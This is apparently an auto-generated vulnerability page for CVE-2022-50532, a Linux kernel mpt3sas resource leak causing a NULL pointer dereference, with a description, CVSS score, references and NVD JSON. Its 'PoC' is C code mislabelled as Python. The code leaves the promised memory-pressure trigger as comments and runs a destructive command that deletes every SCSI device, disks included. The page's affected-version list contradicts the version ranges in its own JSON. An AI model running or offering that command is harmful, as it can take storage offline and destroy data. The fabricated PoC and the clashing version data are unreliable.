CVE-2022-50532

Description

In the Linux kernel, the following vulnerability has been resolved: scsi: mpt3sas: Fix possible resource leaks in mpt3sas_transport_port_add() In mpt3sas_transport_port_add(), if sas_rphy_add() returns error, sas_rphy_free() needs be called to free the resource allocated in sas_end_device_alloc(). Otherwise a kernel crash will happen: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000108 CPU: 45 PID: 37020 Comm: bash Kdump: loaded Tainted: G W 6.1.0-rc1+ #189 pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : device_del+0x54/0x3d0 lr : device_del+0x37c/0x3d0 Call trace: device_del+0x54/0x3d0 attribute_container_class_device_del+0x28/0x38 transport_remove_classdev+0x6c/0x80 attribute_container_device_trigger+0x108/0x110 transport_remove_device+0x28/0x38 sas_rphy_remove+0x50/0x78 [scsi_transport_sas] sas_port_delete+0x30/0x148 [scsi_transport_sas] do_sas_phy_delete+0x78/0x80 [scsi_transport_sas] device_for_each_child+0x68/0xb0 sas_remove_children+0x30/0x50 [scsi_transport_sas] sas_rphy_remove+0x38/0x78 [scsi_transport_sas] sas_port_delete+0x30/0x148 [scsi_transport_sas] do_sas_phy_delete+0x78/0x80 [scsi_transport_sas] device_for_each_child+0x68/0xb0 sas_remove_children+0x30/0x50 [scsi_transport_sas] sas_remove_host+0x20/0x38 [scsi_transport_sas] scsih_remove+0xd8/0x420 [mpt3sas] Because transport_add_device() is not called when sas_rphy_add() fails, the device is not added. When sas_rphy_remove() is subsequently called to remove the device in the remove() path, a NULL pointer dereference happens.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux kernel < 5.15.80

Linux kernel 5.16.x < 5.16.14

Linux kernel 5.17.x < 5.17.2

Linux kernel 5.18.x

Linux kernel 6.0.x < 6.0.2

Linux kernel 6.1.0-rc1+ (受影响的开发版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2022-50532 PoC - Trigger NULL pointer dereference via mpt3sas resource leak
// This PoC triggers the vulnerability by causing sas_rphy_add() to fail
// while the device is in an inconsistent state, then triggering removal.

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/scsi/sg.h>

/*
 * The vulnerability is triggered when:
 * 1. A SAS device is being added via mpt3sas_transport_port_add()
 * 2. sas_rphy_add() returns an error (e.g., due to resource constraints)
 * 3. The error path doesn't call sas_rphy_free() to free allocated resources
 * 4. Later, when the device is removed, sas_rphy_remove() is called
 * 5. NULL pointer dereference occurs in device_del()
 *
 * To trigger this from userspace, we can:
 * - Force a hot-plug event on a SAS port while system is under memory pressure
 * - Or use sysfs to trigger specific SCSI host operations
 */

#define SYSFS_SCSI_HOST_PATH "/sys/class/scsi_host"

int trigger_sas_rphy_add_failure() {
    /* Step 1: Find a mpt3sas SCSI host */
    /* Look for /sys/class/scsi_host/hostX where driver is mpt3sas */
    
    /* Step 2: Create memory pressure to cause sas_rphy_add() to fail */
    /* Allocate large amounts of memory to exhaust resources */
    
    /* Step 3: Trigger SAS device rescan which calls mpt3sas_transport_port_add() */
    /* echo "- - -" > /sys/class/scsi_host/hostX/scan */
    
    /* Step 4: The error in sas_rphy_add() leaves resources unfreed */
    /* Step 5: Device removal triggers NULL pointer dereference */
    
    printf("Triggering CVE-2022-50532...\n");
    
    /* Force SAS device rescan */
    system("echo '- - -' > /sys/class/scsi_host/host*/scan 2>/dev/null");
    
    /* Trigger device removal */
    system("echo 1 > /sys/bus/scsi/devices/*/delete 2>/dev/null");
    
    return 0;
}

int main(int argc, char *argv[]) {
    /* Create memory pressure to increase chance of allocation failure */
    /* This makes sas_rphy_add() more likely to fail */
    
    return trigger_sas_rphy_add_failure();
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50532
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50532
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50532/
[4] VulDB https://vuldb.com/cve/CVE-2022-50532
[5] https://git.kernel.org/stable/c/6a92129c8f999ff5b122c100ce7f625eb3e98c4b
[6] https://git.kernel.org/stable/c/6f6768e2fc8638fabdd8802c2ef693d7aef01db1
[7] https://git.kernel.org/stable/c/78316e9dfc24906dd474630928ed1d3c562b568e
[8] https://git.kernel.org/stable/c/ce1a69cc85006b494353911b35171da195d79e25
[9] https://git.kernel.org/stable/c/d17bca3ddfe507874cb826d32721552da12e741f
[10] https://git.kernel.org/stable/c/d60000cb1195a464080b0efb4949daf7594e0020

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50532", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:37.273", "lastModified": "2026-03-17T17:13:15.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: mpt3sas: Fix possible resource leaks in mpt3sas_transport_port_add()\n\nIn mpt3sas_transport_port_add(), if sas_rphy_add() returns error,\nsas_rphy_free() needs be called to free the resource allocated in\nsas_end_device_alloc(). Otherwise a kernel crash will happen:\n\nUnable to handle kernel NULL pointer dereference at virtual address 0000000000000108\nCPU: 45 PID: 37020 Comm: bash Kdump: loaded Tainted: G W 6.1.0-rc1+ #189\npstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : device_del+0x54/0x3d0\nlr : device_del+0x37c/0x3d0\nCall trace:\n device_del+0x54/0x3d0\n attribute_container_class_device_del+0x28/0x38\n transport_remove_classdev+0x6c/0x80\n attribute_container_device_trigger+0x108/0x110\n transport_remove_device+0x28/0x38\n sas_rphy_remove+0x50/0x78 [scsi_transport_sas]\n sas_port_delete+0x30/0x148 [scsi_transport_sas]\n do_sas_phy_delete+0x78/0x80 [scsi_transport_sas]\n device_for_each_child+0x68/0xb0\n sas_remove_children+0x30/0x50 [scsi_transport_sas]\n sas_rphy_remove+0x38/0x78 [scsi_transport_sas]\n sas_port_delete+0x30/0x148 [scsi_transport_sas]\n do_sas_phy_delete+0x78/0x80 [scsi_transport_sas]\n device_for_each_child+0x68/0xb0\n sas_remove_children+0x30/0x50 [scsi_transport_sas]\n sas_remove_host+0x20/0x38 [scsi_transport_sas]\n scsih_remove+0xd8/0x420 [mpt3sas]\n\nBecause transport_add_device() is not called when sas_rphy_add() fails, the\ndevice is not added. When sas_rphy_remove() is subsequently called to\nremove the device in the remove() path, a NULL pointer dereference happens."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.8", "versionEndExcluding": "5.4.229", "matchCriteriaId": "2D080028-167F-41C2-A2C8-AB2729AEFA92"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6a92129c8f999ff5b122c100ce7f625eb3e98c4b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6f6768e2fc8638fabdd8802c2ef693d7aef01db1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/78316e9dfc24906dd474630928ed1d3c562b568e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ce1a69cc85006b494353911b35171da195d79e25", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d17bca3ddfe507874cb826d32721552da12e741f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d60000cb1195a464080b0efb4949daf7594e0020", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}